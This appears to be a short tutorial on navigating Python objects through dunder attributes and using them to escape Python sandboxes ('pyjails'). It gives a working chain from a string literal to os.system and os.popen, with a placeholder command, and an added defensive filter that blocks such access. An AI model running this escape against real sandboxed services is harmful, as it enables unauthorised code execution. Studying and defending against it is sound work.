Navigating Python Objects
How to navigate Python objects, plus some tricks for bypassing Python sandbox protections (pyjails).
Methods
__class__
Returns the class (type) to which the object belongs.
__mro__
Returns a tuple containing the class itself and the base classes it inherits from. Methods are resolved in tuple order.
__subclasses__
Each class keeps weak references to its immediate subclasses, and this method returns a list of the references that are still alive.
__builtins__
A reference to the built-in functions and names (the builtins module or its dictionary) available to a module or function.
__globals__
A reference to the dictionary that contains a function's global variables.
__base__
Returns the base class that the class inherits from (__base__ and __mro__ are both used to find the base class).
__init__
Class initialization method.
dir()
Built-in function that lists all methods and attributes of an object.
Navigation
Goal: find warnings (catch_warnings), because it imports the sys module (see HERE), and from sys you can reach os.
Get the string class
''.__class__
# <class 'str'>
Go up by getting the inherited base classes (object)
''.__class__.__mro__
# (<class 'str'>, <class 'object'>)
Get all subclasses of object
''.__class__.__mro__[1].__subclasses__()
# [<class '…'>, …]
Look for catch_warnings and its index.
# enumerate() avoids an IndexError when there are fewer than 450 subclasses
for i, cls in enumerate(''.__class__.__mro__[1].__subclasses__()):
    print(i, cls.__name__)
# index NAME
# index NAME
# etc…
Import os and call system(). You can't see the command's output.
''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').system("COMMAND")
# returns the error code, or 0 if the command was executed correctly
Import os and call popen with read(). You can see the output.
''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').popen("COMMAND").read()
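A defender-side check for the chain above, as an added example that is not part of the original page: it shows that evaluating with an empty `__builtins__` still exposes the subclasses of object, and it pre-filters untrusted expressions by rejecting underscore-prefixed attribute or name access and string constants containing `__`. The function names and the variable `w` are hypothetical, and the filter is a pre-check to pair with process-level isolation, not a sandbox on its own.

```python
import ast

# First three steps of the chain from this page; it needs no builtins at all.
CHAIN = "''.__class__.__mro__[1].__subclasses__()"

def builtins_stripped_still_leaks():
    """Evaluate CHAIN with an empty __builtins__ and report whether it still works."""
    result = eval(CHAIN, {"__builtins__": {}}, {})
    return isinstance(result, list) and len(result) > 0

def find_introspection(source):
    """Return sorted (line, kind, name) findings for introspection-style access."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr.startswith("_"):
            findings.append((node.lineno, "attribute", node.attr))
        elif isinstance(node, ast.Name) and node.id.startswith("_"):
            findings.append((node.lineno, "name", node.id))
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and "__" in node.value):
            # Catches dunder names passed as subscript keys, e.g. ['__import__'].
            findings.append((node.lineno, "string", node.value))
    return sorted(findings)

def is_allowed(source):
    """Reject anything that does not parse or that touches private/dunder names."""
    try:
        return not find_introspection(source)
    except (SyntaxError, ValueError):
        return False

if __name__ == "__main__":
    # Constructed sample inputs; `w` is a hypothetical variable name.
    samples = ["(1 + 2) * 3", CHAIN, "w._module.__builtins__['__import__']"]
    print("empty __builtins__ still leaks:", builtins_stripped_still_leaks())
    for s in samples:
        print("ALLOW" if is_allowed(s) else "BLOCK", s, find_introspection(s))
```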
Resources
pyjailbreaker (yet to be seen)